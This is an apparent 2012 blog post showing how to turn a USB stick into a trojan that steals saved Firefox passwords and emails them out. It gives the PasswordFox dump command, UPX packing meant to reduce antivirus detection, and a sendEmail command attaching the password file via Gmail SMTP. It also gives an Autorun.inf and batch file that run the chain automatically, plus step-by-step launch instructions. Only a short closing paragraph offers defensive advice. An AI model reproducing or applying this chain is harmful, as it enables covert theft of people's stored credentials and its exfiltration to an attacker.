27/04/2012

Trojana-zing USB sticks

USB nowadays 

Now days most of us have a USB flash drive (sometimes also referred to as a USB stick, USB memory stick or simply a flash drive) that what we use when we want to store data temporarily. They are really small and lightweight and are very practical when you want to move files from one computer to another.

That is all fine, but what happens when none trusted USB’s are inserted in our USB stick drives, how difficult is it for someone to steal and e-mail all our passwords within seconds? Well the answer for someone that knows is simple, a few seconds is more than enough for someone to collect all your passwords from your laptop.

USB flash drives are used when data is moved between home and office. They are also often used when data is moved inside an office, for example when moving data to/from a computer that is not connected to a network. Obviously that is the main reason that a PC not connected to internet can be infected with Trojans, viruses and other malicious software. A very well known worm that had a great impact worldwide is Conflicker [9].  Conflicker initially did not use USB’s as a infection medium, but later on it updated itself and started infecting USB stick, and that was when the spreading increased dramatically.

Trojan-azing a USB stick

How difficult is for someone to convert a USB stick into a Trojan? Well this article is going to so you that even a person with little to no knowledge of computers can steal and e-mail your passwords using open source and freeware software to construct a USB Trojan that is practically not traceable from industry software antivirus, because this programs are legitimate programs, but when combined together can do real damage.

The key components of constructing a USB Trojan would be:

  1. The password collector (e.g. tool that is going to collect your password).
  2. The transportation method (e.g. method to send over Internet the stolen passwords).
  3. A compressor (e.g. reduce the payload size )
  4.  The execution method (e.g. the method to execute the desired payload when USB is inserted to the target PC).
Well the first tool to use would be the password collector, for the purpose of this article I am going to use PasswordFox, for the transportation method I will use SMTP along with a tool called Sentmail and for the execution method I will use Autorun. 

About SendEmail our Communication Channel

SendEmail is a lightweight, command line SMTP email client. With it you can send e-mails from a command line, this free program is perfect, simple to use and feature rich. It was designed to be used in bash scripts, batch files. SendEmail is written in Perl (but can also run as a standalone executable in windows) and is unique in that it requires NO MODULES. It has an intuitive and flexible set of command-line options, making it very easy to use. SendEmail is licensed under the GNU GPL, either version 2 of the License or any later version.  Supported Platforms are Linux, BSD, OS X, Windows 98, Windows NT, Windows 2000, & Windows XP. [1]

The following picture show a screen shot of the Sentmail help from command line:

 
Note: Sentmail also supports TLS but for the purposes of this article we are not going to use the TLSv1.0 option, although it might be a good idea to do it if you want to bypass reverse SSL proxies or content inspection devices.

Why use Sentmail?

I think that is obvious how Sentmail can be used for malicious purposes such as spamming, e-mail spoofing attacks, and automated virus distribution e.t.c.  , a malicious user can simply integrate the Sentmail executable to another executable (e.g. notepad.exe) as a Trojan  using a packer such as upx  [2] or IExpress Wizard [3] , upload the executable in his/her web site and then use social engineering to convince innocent users to download and execute the maliciously altered  executable. But the most interesting characteristics of Sentmail are that it is a standalone executable and its size is only 692 KB.

About PasswordFox as our Password Collector

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signors filename.  This utility works under Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows 7. Firefox should also be installed on your system in order to use this utility. [4]

Why Use PasswordFox

PasswordFox doesn't require any installation process or additional DLL files, but firefox browser must be installed on your computer in order allow PasswordFox to grab the targeted passwords list. PasswordFox is again a standalone executable and in order to start using PasswordFox, you can simply double click the executable file.

After running it, the main window will display your entire passwords firefox list for the last profile that you used.  That’s not all PasswordFox can do. PasswordFox can also run from command line and splash you firefox password list into a txt file. Also the tool size is ridiculously small only 40 KB, amazing what 40 KB can do to your firefox password profile eee?

The following screen shot shows how we can actually use PasswordFox from command line is:


Note:  Not much to see, PasswordFox tool does not support the help command. Check out the /stext options used, this option is going to export all my firefox passwords into the txt file named pass.txt.

About UPX as our Compressor

UPS is a freeware high quality executable compressor, and ideal for our job.  The UPX author claims that it has a better compression rate than that of WinZip/zip/gzip with no memory overhead for your compressed executables. UPX is distributed with full source code under the GNU General Public License v2+, with special exceptions granting the free usage for commercial programs as stated in the UPX License Agreement. [2]

Compressing our executables

We will compress our executables using UPX for two main reasons, first to reduce antivirus detection possibility and second to reduce the size of our executables.  Antivirus bypassing is not so easy to achieve and out of the scope of this article. So let’s go on and compress our executables.  From the command line the commands we have to issue are:

  1. upx –brute Sentmail.exe
  2. upx –brute PasswordFox.exe
The following screen shot shows the outcome of this command:


Note:  The PasswordFox.exe was already compressed with upx by the author.  

Sending our Password Collection Using Sentmail

Sending a not easily traceable e-mail is not going to be easy. We will need either use a costume valid e-mail address from publicly well known e-mail servers such as Google and Yahoo or we can use an open mail relay server.  

An open mail relay is an SMTP server configured in such a way that it allows anyone on the Internet to send e-mail through it, not just mail destined to or originating from known users. This used to be the default configuration in many mail servers; indeed, it was the way the Internet was initially set up, but open mail relays have become unpopular due to their exploitation by spammers and worms. Many relays were closed, or were placed on blacklists by other servers. [5]


For the purpose of this article we will use Google Mail Serve to send our malicious e-mail this, so the following command would do the Job:


sendEmail.exe -t  somemail@something.com -o tls=auto  -f  yourgmail@gmail.com  -u youmailsubject  -m yourmailbody  -a pass.txt -s smtp.gmail.com -xp yourpassword  -xu youusername


Note: In order to use Google mail you have to use TLS (Sentmail does support TLS, so it is not going to be a problem). The –a option add the file attachment containing the passwords.

Launching a program on a USB

Using Autorun.inf to automatically launch a program on a USB flash drive is very easy, but you have to know the windows platform (e.g. Windows 7, Vista, XP e.t.c) it depends on the version of the Windows you are targeting  the design your USB Autorun. Below I will show you how to handle this in different Windows versions. [7]

Handling different Windows versions would be mean using the keyword START and ACTION in the Autorun.inf file.  So the Autorun file would look like this in its final form:
  1. [AutoRun]
  2. OPEN=run.bat
  3. ACTION=run.bat 
The run.bat file is a bat file (also called batch file) that you can edit with notepad and add the commands show below:
  1. Start PasswordFox.exe /stext
  2. Start Sentmail <parameters>

If autorun is disabled on a specific computer, you will not see the autorun menu when the flash drive is plugged in; hence the application will not start automatically. In that case you will be forced to explore the drive and run the program manually. If you need to launch the program with specific command line parameters then you can open a console window and type the parameters there, or use a .BAT script to do the same task. [10]

Finally launching the attack

Step 1:  Copy the .Bat file that issues the command described above.
Step 2: Make sure USB Autorun is enabled in the target machine.
Step 3: Copy the Autorun.inf file with the configuration described above.

Further Attack improvements

The attack described in this article can be optimized to be more resilient to antivirus software, but bypassing antivirus software is out of the scope of this article due to its added complexity.

Bypassing the auto-run limitation

The Teensy USB HID Attack Vector is a remarkable combination of customized hardware and bypassing restrictions by keyboard emulation. Traditionally, when you insert a DVD/CD or USB if autorun is disabled (after Windows XP service pack 2 autorun is disabled, I think it is SP2!), your autorun.inf isn’t called and you can’t execute your code automatically. With the Teensy HID based device you can emulate a keyboard and mouse. When you insert the device it will be detected as a keyboard, and with the microprocessor and onboard flash memory storage you can send a very fast set of keystrokes to the machine and completely compromise it. You can order a Teensy device for around 17 dollars at http://www.prjc.com.

The following extract was taken from the blog of werew01f which he/she was kind enough to commend on the inaccuracy of this blog post:

Teensy, USB-based micro-controller development board, which can be programmed to emulate as any device and store programming code. I have wrote an article that describes how you can emulate the device as a HID (Human Interface Device) and inject attack codes and execute commands in the system.
    
Epilogue

I sure I proved how easy is to steal and e-mail user credentials within a few seconds even you have little to no experience at all. Again nowadays it is very critical to protect your assets from all dangers. The best think someone could do to protect his/her information is to disable autorun and apply proper Endpoint Protection Software.

References:

  1. http://caspian.dotconf.net/menu/Software/SendEmail/
  2. http://upx.sourceforge.net/
  3. http://technet.microsoft.com/en-us/library/dd346760.aspx
  4. http://www.nirsoft.net/utils/passwordfox.html
  5. http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sean_taylor-binary_obfuscation.pdf
  6. http://en.wikipedia.org/wiki/Open_mail_relay
  7. http://www.samlogic.net/articles/autorun-usb-flash-drive.htm
  8. http://www.samlogic.net/articles/autorun-usb-flash-drive-windows-7.htm
  9. http://en.wikipedia.org/wiki/Conficker
  10. http://lazybit.com/index.php/2007/03/01/usb_flash_drive_autorun
  11. http://www.offensive-security.com/metasploit-unleashed/Teensy_USB_HID_Attack